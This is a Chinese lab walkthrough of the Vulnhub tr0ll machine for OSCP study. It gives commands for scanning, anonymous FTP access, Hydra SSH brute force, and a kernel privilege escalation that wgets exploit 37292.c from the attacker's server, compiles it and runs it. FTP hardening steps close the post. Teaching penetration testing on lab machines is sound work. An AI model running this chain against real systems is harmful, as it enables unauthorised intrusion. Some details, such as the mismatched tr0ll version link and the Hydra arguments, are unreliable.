渗透Vulnhub-tr0ll靶机

本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列tr0ll靶机有定的了解

一、信息收集阶段

靶机官网:https://www.vulnhub.com/entry/tr0ll-3,340/

因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,发现主机

nmap -sP 192.168.60.0/24 

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.171
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等

二、攻击面寻找阶段

1、web页面枚举

dirb http://192.168.60.171 

2、ftp匿名登陆

刚才在信息收集阶段通过nmap得知21端口存在ftp匿名登录,这里我们尝试登录

ftp 192.168.60.171
#账号:ftp
#密码:空

3、ftp下载pcap流量包文件

get lol.pcap  #ftp下载lol.pcap文件

4、wireshark打开pcap文件过滤数据包


流量分析:

5、下载sup3rs3cr3tdirlol的二进制文件

wget http://192.168.60.171/sup3rs3cr3tdirlol/roflmao


执行一下看看

chmod 777 roflmao
./roflmao   

6、海德拉爆破

wget 192.168.60.171/0x0856BF/this_folder_contains_the_password/Pass.txt  #下载账号文本
wget 192.168.60.171/0x0856BF/good_luck/which_one_lol.txt 		#下载密码文本

hydra -L which_one_lol.txt -p Pass.txt 192.168.60.171 ssh -v #指定文件爆破目标ssh

7、ssh登录

ssh overflow@192.168.60.171   #使用overflow登录目标机
uname -a
lsb_release

三、攻击提权阶段

1、查看内核版本历史漏洞

#我们通过uname -a  lsb_release查看到系统内核
searchsploit Ubuntu 14.04|grep 3.13.0

2、下载exp文件

searchsploit  -m 37292.c  

3、kali开启http微服务

python -m http.server 8088

4、ssh靶机下载exp文件

ls -la #查看哪个目录可以写入执行
cd /tmp
wget http://192.168.60.128:8088/37292.c

5、python创建终端

python -c "import pty;pty.spawn('/bin/bash')"

6、编译利用exp文件

gcc -o exp 37292.c   #编译利用文件 保存为exp
chmod +x exp		#exp文件添加执行权限
./exp			#执行提权

四、ftp匿名登录防范措施

1、vsftpd

#打开vsftpd的配置文件,通常位于 /etc/vsftpd/vsftpd.conf 或 /etc/vsftpd.conf。
anonymous_enable=NO   #找到配置文件把值改成NO
sudo systemctl restart vsftpd   #重启vsftpd服务

2、ProFTPD

#打开ProFTPD的配置文件,通常位于 /etc/proftpd/proftpd.conf 或 /etc/proftpd.conf
<Anonymous ~ftp>    #整行注释掉
sudo systemctl restart proftpd		#重启proftpd服务

声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值